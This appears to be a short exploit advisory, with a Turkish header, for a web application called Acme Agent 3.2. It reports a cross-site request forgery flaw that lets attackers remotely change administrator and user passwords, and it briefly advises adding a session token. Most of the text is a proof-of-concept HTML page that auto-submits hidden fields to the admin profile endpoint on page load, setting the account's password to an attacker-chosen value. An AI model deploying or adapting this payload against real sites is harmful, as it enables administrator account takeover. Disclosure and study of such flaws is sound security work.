< ------------------- header data start ------------------- >

#############################################################

# Application Name : Acme Agent 3.2

# Vulnerable Type : Cross Site Request Forgery

# Infection : Yönetici ve user sifreleri uzaktan degisilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.jock3r.submit();}</script>

<Form Action=http://www.site.com/[PATCH]/admin/main/profile.php method=post >
<input type=hidden name=email class=frm value=[email protected]>
<input type=hidden name=username class=frm value=jock3r>
<input type=hidden class=frm name=password value=jock3r>
<input type=hidden class=frm name=confirm_password value=jock3r>
<input type=hidden class=frm name=contact_name value=jock3r>
<input type=hidden name=phone class=frm value=1231231234>
<input type=hidden name=address class=frm value=1212 jock3r>
<input type=hidden name=city class=frm value=jock3r>
<option value=1 >Alaska</option>
<input type=hidden name=zip class=frm value=1234>
<input type=submit value=create name=B1>

< -- bug code end of -- >